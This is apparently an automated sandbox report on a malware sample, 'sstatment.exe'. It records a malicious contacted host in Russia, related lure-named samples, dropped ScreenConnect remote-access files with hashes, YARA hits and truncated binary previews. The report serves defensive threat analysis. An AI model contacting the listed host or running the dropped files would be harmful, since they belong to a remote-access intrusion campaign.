http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v | rundll32.exe, 00000004.00000003.1709211710.0000000004773000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | false | | unknown
https://feedback.screenconnect.com/Feedback.axd | ScreenConnect.Core.dll.2.dr | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-support | ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
Contacted IPs:
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
85.239.34.190 | yell64u.top | Russian Federation | | 134121 | RAINBOW-HKRainbownetworklimitedHK | true
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1534362
                                          Start date and time:2024-10-15 19:19:07 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 5s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:14
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:sstatment.exe
                                          Detection:MAL
                                          Classification:mal42.evad.winEXE@17/56@1/1
                                          EGA Information:
                                          • Successful, ratio: 60%
                                          HCA Information:
                                          • Successful, ratio: 65%
                                          • Number of executed functions: 182
                                          • Number of non-executed functions: 4
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target rundll32.exe, PID 3332 because it is empty
                                          • Execution Graph export aborted for target sstatment.exe, PID 4320 because it is empty
• Not all processes were analysed; the report is missing behavior information
• Report size exceeded maximum capacity and may be missing behavior information
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                          • VT rate limit hit for: sstatment.exe
Simulations: none
IPs: no context
Domains: no context
ASNs: context for RAINBOW-HK Rainbownetworklimited HK (samples previously seen contacting this ASN)
Associated Sample Name | Detection | Threat Name | Contacted IP
aa.LnK.lnk | malicious | Unknown | 102.165.46.145
lK1DKi27B4.dll | malicious | Unknown | 85.239.52.252
lK1DKi27B4.dll | malicious | Unknown | 85.239.52.252
nPyo7vtpRl.dll | malicious | Unknown | 45.86.230.68
rdl3kBqbTy.dll | malicious | Unknown | 45.86.230.68
nPyo7vtpRl.dll | malicious | Unknown | 45.86.230.68
rdl3kBqbTy.dll | malicious | Unknown | 45.86.230.68
file.exe | malicious | Unknown | 85.239.52.241
file.exe | malicious | Unknown | 85.239.52.241
Havarti.dll | malicious | Unknown | 45.86.230.68
JA3 fingerprints: no context
Dropped files: context (the same file was previously dropped by these samples)
Match: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
Associated Sample Name | Detection | Threat Name
extukGiBrn.exe | malicious | ScreenConnect Tool
Vh0tTzx4Ko.exe | malicious | ScreenConnect Tool
support.Client.exe | malicious | ScreenConnect Tool
support.Client.exe | malicious | ScreenConnect Tool
ScreenConnect.ClientSetup (1).exe | malicious | ScreenConnect Tool
ScreenConnect.ClientSetup (1).exe | malicious | ScreenConnect Tool
Scan_doc_09_16_24_1120.exe | malicious | ScreenConnect Tool
E_BILL9926378035.exe | malicious | ScreenConnect Tool
Scan_doc_09_16_24_1203.exe | malicious | ScreenConnect Tool
E_BILL0041272508.exe | malicious | ScreenConnect Tool
Match: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
Associated Sample Name | Detection | Threat Name
extukGiBrn.exe | malicious | ScreenConnect Tool
Vh0tTzx4Ko.exe | malicious | ScreenConnect Tool
support.Client.exe | malicious | ScreenConnect Tool
support.Client.exe | malicious | ScreenConnect Tool
ScreenConnect.ClientSetup (1).exe | malicious | ScreenConnect Tool
ScreenConnect.ClientSetup (1).exe | malicious | ScreenConnect Tool
Scan_doc_09_16_24_1120.exe | malicious | ScreenConnect Tool
E_BILL9926378035.exe | malicious | ScreenConnect Tool
Scan_doc_09_16_24_1203.exe | malicious | ScreenConnect Tool
E_BILL0041272508.exe | malicious | ScreenConnect Tool
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):219646
                                                                                  Entropy (8bit):6.582047759845621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:MZ9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGJ:MZuH2aCGw1ST1wQLdqvJ
                                                                                  MD5:3637CC2691045F04C0400CC44CFE5DEA
                                                                                  SHA1:9C067384D41371EF4891F4C07766478ABD3314C1
                                                                                  SHA-256:6D00D81062F070C66E9EB90A99BF085D6F121F0EF40B5D3ADD8476365E6E29A4
                                                                                  SHA-512:1B7BBC7C783490E262985630708A9CDEF1C2D8071EFCC24C5613F4787E247F4759785357DCE40A97D16C80CCC2554931F2DD826D8D575731BF17302CF8EDADED
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\5e3177.rbs, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Preview:...@IXOS.@.....@.jOY.@.....@.....@.....@.....@.....@......&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.@......&.{E2565D0B-BCDD-C1A1-A2A2-7660FC61A23D}&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.@......&.{A9BEA7A3-6285-A159-CBF3-596C269E6678}&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.@......&.{567A6AC5-C59B-6D1E-4D5E-D3E6B358A6AB}&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.@....
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):4.646296001566109
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eA7d5TlO5FMDKt5cFqu+HIR:zHE4rbM2xjU7M8LD7DTlcFq0qEIR
                                                                                  MD5:8B45555EF2300160892C25F453098AA4
                                                                                  SHA1:0992EBA6A12F7A25C1F50566BEEB3A72D4B93461
                                                                                  SHA-256:75552351B688F153370B86713C443AC7013DF3EE8FCAC004B2AB57501B89B225
                                                                                  SHA-512:F99FF9A04675E11BAF1FD2343AB9CE3066BAB32E6BD18AEA9344960BF0A14AF8191DDCCA8431AD52D907BCB0CB47861FFB2CD34655F1852D51E04ED766F03505
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....4..2...n_Q2T}........Z...5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.F...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.t.....Support..Support.2Software is Updating.Do not turn off your computer.,Not enough data receiving from host computer..Removed
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):21018
                                                                                  Entropy (8bit):7.841465962209068
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:rcoN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dH:P4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bd
                                                                                  MD5:EF6DBD4F9C3BB57F1A2C4AF2847D8C54
                                                                                  SHA1:41D9329C5719467E8AE8777C2F38DE39F02F6AE4
                                                                                  SHA-256:0792210DE652583423688FE6ACAE19F3381622E85992A771BF5E6C5234DBEB8E
                                                                                  SHA-512:5D5D0505874DC02832C32B05F7E49EAD974464F6CB50C27CE9393A23FF965AA66971B3C0D98E2A4F28C24147FCA7A0A9BFD25909EC7D5792AD40CED7D51ED839
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2..;..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..E..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.xO.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):50133
                                                                                  Entropy (8bit):4.759054454534641
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                  MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                  SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                  SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                  SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):26722
                                                                                  Entropy (8bit):7.7401940386372345
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                  MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                  SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                  SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                  SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):197120
                                                                                  Entropy (8bit):6.58476728626163
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                  MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                  SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                  SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                  SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
• Filename: extukGiBrn.exe, Detection: malicious
• Filename: Vh0tTzx4Ko.exe, Detection: malicious
• Filename: support.Client.exe, Detection: malicious
• Filename: support.Client.exe, Detection: malicious
• Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious
• Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious
• Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious
• Filename: E_BILL9926378035.exe, Detection: malicious
• Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious
• Filename: E_BILL0041272508.exe, Detection: malicious
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):68096
                                                                                  Entropy (8bit):6.068776675019683
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                  MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                  SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                  SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                  SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
• Filename: extukGiBrn.exe, Detection: malicious
• Filename: Vh0tTzx4Ko.exe, Detection: malicious
• Filename: support.Client.exe, Detection: malicious
• Filename: support.Client.exe, Detection: malicious
• Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious
• Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious
• Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious
• Filename: E_BILL9926378035.exe, Detection: malicious
• Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious
• Filename: E_BILL0041272508.exe, Detection: malicious
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):95520
                                                                                  Entropy (8bit):6.505346220942731
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                  MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                  SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                  SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                  SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):548864
                                                                                  Entropy (8bit):6.031251664661689
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1721856
                                                                                  Entropy (8bit):6.639136400085158
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):260168
                                                                                  Entropy (8bit):6.416438906122177
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                                  MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                  SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                  SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                  SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):61216
                                                                                  Entropy (8bit):6.31175789874945
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                  MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                  SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                  SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                  SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):266
                                                                                  Entropy (8bit):4.842791478883622
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
